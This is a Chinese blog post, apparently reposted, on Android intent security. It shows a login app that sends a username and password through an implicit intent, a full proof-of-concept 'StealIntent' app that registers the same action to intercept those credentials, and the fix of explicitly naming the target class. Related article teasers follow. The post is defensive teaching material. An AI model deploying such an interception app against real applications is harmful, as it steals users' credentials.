android安全-intent

最新推荐文章于 2024-07-14 14:06:23 发布
最新推荐文章于 2024-07-14 14:06:23 发布
阅读量2.2k 收藏
点赞数
分类专栏: 安全性测试
本文讨论了在Android环境中使用Intent进行信息传递时的安全风险,并提供了避免数据泄露的方法。通过实例展示了如何通过显式指定接收方来保护敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原文: http://www.sectop.com/?p=187

 

一、intent简介

android环境中,intent主要用于信息传递,intent如果使用隐式方式(setaction)来标识intent消息,接收方通过此action来接收信息。

如果intent没有明确指定哪些接收方有权限接收,则恶意程序指定action标识后,获取intent内容,将导致数据泄露。

二、实例

intent可以分别用startactivity,startservice,sendbroadcast方法,给activity,service和broadcat传递信息。

下面例子使用activity,

应用SendIntent是正常应用,有两个activity,LoginActivity用于登录界面,MainActiviey用于显示登录后的界面和提交的intent信息;

SendIntent androidmanifest.xml

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<? xml version = "1.0" encoding = "utf-8" ?>
< manifest xmlns:android = "http://schemas.android.com/apk/res/android"
       package = "com.xiaod.SendIntent"
       android:versionCode = "1"
       android:versionName = "1.0" >
     < uses-sdk android:minSdkVersion = "8" />
  
     < application android:icon = "@drawable/icon" android:label = "@string/app_name" >
         < activity android:name = ".LoginActivity"
                   android:label = "@string/app_name" >
             < intent-filter >
                 < action android:name = "android.intent.action.MAIN" />
                 < category android:name = "android.intent.category.LAUNCHER" />
             </ intent-filter >
         </ activity >
         < activity android:name = ".MainActivity" android:label = "Main" >
             < intent-filter >
                 < action android:name = "com.xiaod.SendIntent.action.main" />
                 < category android:name = "android.intent.category.DEFAULT" />
             </ intent-filter >
         </ activity >
     </ application >
</ manifest >

LoginActivity.java

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
package com.xiaod.SendIntent;
  
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
import android.widget.EditText;
  
public class LoginActivity extends Activity {
     private EditText et_user;
     private EditText et_pwd;
     private Button btn_login;
     /** Called when the activity is first created. */
     @Override
     public void onCreate(Bundle savedInstanceState) {
         super .onCreate(savedInstanceState);
         setContentView(R.layout.login);
  
         et_user = (EditText) findViewById(R.id.et_user);
         et_pwd = (EditText) findViewById(R.id.et_pwd);
         btn_login = (Button) findViewById(R.id.btn_login);
  
         btn_login.setOnClickListener( new OnClickListener(){
  
             @Override
             public void onClick(View v) {
                 // TODO Auto-generated method stub
                 Intent m_intent = new Intent();
                 m_intent.putExtra( "username" , et_user.getText().toString());
                 m_intent.putExtra( "password" , et_pwd.getText().toString());
                 m_intent.setAction( "com.xiaod.SendIntent.action.main" );
                 m_intent.addCategory(Intent.CATEGORY_DEFAULT);
                 startActivity(m_intent);
             }
  
         });
     }
}

应用StealIntent是恶意应用,用于窃听SendIntent应用中LoginActivity界面发送给MainActiviey界面的intent。

StealIntent androidmanifest.xml

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<? xml version = "1.0" encoding = "utf-8" ?>
< manifest xmlns:android = "http://schemas.android.com/apk/res/android"
       package = "com.xiaod.StealIntent"
       android:versionCode = "1"
       android:versionName = "1.0" >
     < uses-sdk android:minSdkVersion = "8" />
  
     < application android:icon = "@drawable/icon" android:label = "@string/app_name" >
         < activity android:name = ".StealIntentActivity"
                   android:label = "@string/app_name" >
             < intent-filter >
  
                 < action android:name = "com.xiaod.SendIntent.action.main" />
                 < category android:name = "android.intent.category.DEFAULT" />
             </ intent-filter >
         </ activity >
  
     </ application >
</ manifest >

StealIntentActivity.java

 

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
package com.xiaod.StealIntent;
  
import android.app.Activity;
import android.os.Bundle;
import android.widget.Toast;
  
public class StealIntentActivity extends Activity {
     /** Called when the activity is first created. */
     @Override
     public void onCreate(Bundle savedInstanceState) {
         super .onCreate(savedInstanceState);
         setContentView(R.layout.main);
         Toast.makeText(getBaseContext(),
                 "username: " + this .getIntent().getStringExtra( "username" )+
                 "\npassword: " + this .getIntent().getStringExtra( "password" ),
                 Toast.LENGTH_SHORT).show();
     }
}

在SendIntent点击登录后,StealIntent也会接收到intent发送的信息

三、解决方法

不要使用action标识intent,显式地指定intent发送到的包和处理类

?
1
2
3
4
5
Intent m_intent = new Intent();
m_intent.putExtra( "username" , et_user.getText().toString());
m_intent.putExtra( "password" , et_pwd.getText().toString());
m_intent.setClassName( "com.xiaod.SendIntent" , "com.xiaod.SendIntent.MainActivity" );
startActivity(m_intent);
TIB
关注
专栏目录
保护Android上的通信安全
2401_84297899的博客
04-29 409
二 更新加密提供程序多年来,HTTPS协议已被多次利用。当安全研究人员报告漏洞时,缺陷通常会被修补。应用修补程序可确保应用程序的网络连接使用最新的行业标准协议。最新版本的协议包含的弱点比以前少。要更新,您需要包含Google Play服务。该服务API还有更多的功能,包括API,检查的网址,看看他们是否已被标记为已知威胁,以及API,以防止垃圾邮件和其他恶意流量您的应用程序。同步完成后摇篮,你可以调用的onProviderInstalled()当提供程序成功更新或已更新时,将调用此方法。
Android入门之Intent在Activity中的用法--显示Intent
派大星子的博客
11-06 1531
Android入门之Intent在Activity中的用法--显示Intent
Android Intent安全性检查
我用双手成就你的梦想,所以我必须努力
11-02 1214
在平时的开发中,跳转我们自己写的activity的时候,一般都是通过显式intent进行跳转.所以不用做什么安全性检查 但是当我们使用隐式意图来进行调起别的应用的activity时.就需要检查安全性了,否则activity不存在.可是会使程序崩溃的哟 检查intent安全性有以下两种方式: 第一种: /** * 检测 响应某个意图的Activity 是否存在 * @param co
Android安全Android中的Intent
Juruo@Security
11-27 546
Android中的Intent
Android中的Intent意图安全
nextdoor6的博客
08-30 4244
什么是意图 Intent(意图)主要是用于激活组件和解决Android应用的各项组件之间的通讯。 意图有分为显式意图和隐式意图。 意图的使用 显式意图使用代码,贴出主要显示意图跳转的代码。 public class MainActivity extends ActionBarActivity { @Override protected void onCrea
android应用安全——组件通信安全Intent
xyzlmn的专栏
04-16 385
这里主要涉及到了Activity、Content Provider、Service、Broadcast Receiver等。这些如果在Androidmanifest.xml配置不当,会被其他应用调用,引起风险。android应用内部的Activity、Service、Broadcast Receiver等,他们通过Intent通信,组件间需要通信就需要在Androidmanifest.xml...
Android-Intent-数据存取-ContentProvider.pdf
最新发布
06-30
在本篇文档“Android-Intent-数据存取-ContentProvider.pdf”中,将详细介绍Intent机制在数据存取方面的应用,深入探讨ContentProvider的设计原理和使用方法,以及如何在保证数据安全的前提下通过ContentProvider...
Android-Intent-数据存取-ContentProvider.doc
04-09
"Android Intent 和 ContentProvider" Android IntentAndroid 组件之间的信使,负责在 Android 三大核心组件(Activity、Service、Broadcast Receiver)之间传递信息。Intent 是一个将要执行的动作的抽象描述...
Android课程第二次实验报告-Intent传值.docx
03-27
【实验报告】Android课程第二次实验报告 - Intent传值 在这个实验中,主要目的是掌握在Android应用开发中如何通过Intent来实现在不同Activity之间的跳转以及数据传递。IntentAndroid系统中用于启动另一个组件(如...
Android安全Intent Scheme Url攻击分析
12-08
Intent scheme url的引入虽然带来了一定的便捷性,但从另外一方面看,给恶意攻击页面通过intent-based攻击终端上已安装应用提供了便利,尽管浏览器app已经采取了一定的安全策略来减少这一类风险,但显然是不够的。...
Android中的Intent Filter安全
weixin_34186931的博客
07-24 113
更多原文请见:http://mobile.51cto.com/abased-349323.htm     IntentAndroid应用程序核心组件之间通信和传递信息的核心机制。之相关的IntentFilter也具有相关的安全机制(测试)来进行约束。本文将对其进行详细介绍。   一、IntentIntentFilter简介 一个应用程序的三个核心组件(活动,服务和广播接收器)都是...
Intent组件的安全机制
a15659164058的博客
12-15 391
1) IntentIntentFilter简介       Intent(意图)本身是一个包含被执行操作抽象描述的被动的数据结构,对于广播而言,是某件已经发生并被声明的事件的描述。在Android系统中,存在如下几种不同的机制来传送Intent到每种组件中。       (1) 一个Intent对象传递给Context.startActivity()或Context.startActivit
Intent安全测试
weixin_30477293的博客
03-11 241
Google对Intent的相关函数定义: https://developer.android.com/reference/android/content/Context.html Activity:startActivity()startActivityForResult()startActivities(Intent[] intents, Bundle options) -- Launc...
Android中的Intent
fry3309的博客
06-14 4447
Android中的Intent可以用来在一个组件中启动App中的另一个组件或者是启动另一个App的组件,这里所说的组件指的是Activity、Service以及Broadcast。
Android15快速适配指南
yan_chenglong的博客
07-14 3243
无论你是否调整你的应用targetSdkVersion到Android15,以下是都会在android15手机上生效的改动,需要评估你的应用是否有使用到这些API,并评估改动是否会影响到你的应用行为。
android api分析15 Intent实例
huanyi0723的专栏
07-01 511
点击后 返回桌面
判断Intent是否安全的方法
Markus
08-07 993
提前验证是否有APP可以接受一个Intent,这样可以在发送Intent前,避免发送的Intent没有能够接收的APP,导致FC。 方法一: Intent intent = getInstallAppIntent(activity, appFile); if (activity.getPackageManager().queryIntentActivities(intent, 0).siz...
Android----Intent详解
得之我幸--失之我命
02-01 822
1.Intent对于Android应用的作用       大体可以分为两个功能:       ① 封装Android应用程序需要启动某个组件的“意图”       ② 作为应用组件之间的通信的媒介,将需要交换的数据封装成Bundle对象,然后使用Intent来携带Bundle对象 2.Intent对象详解     2.1 使用Intent启动系统组件              启动Ac
AndroidIntent介绍和使用
习惯成自然
06-10 1662
Intent是什么             通信技术不发达时,人们通过信件的方式通信,其中邮递员起到了传递信息的作用。在Android系统中,组件之间的通信员就是Intent,它使得组件间得以通信。     Intent,中文翻译成“意图”,最常见的用途是绑定应用程序组件。通过Intent,你的程序组件可以向Android表达某种意图,Android会根据你的意图内容选择合适的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值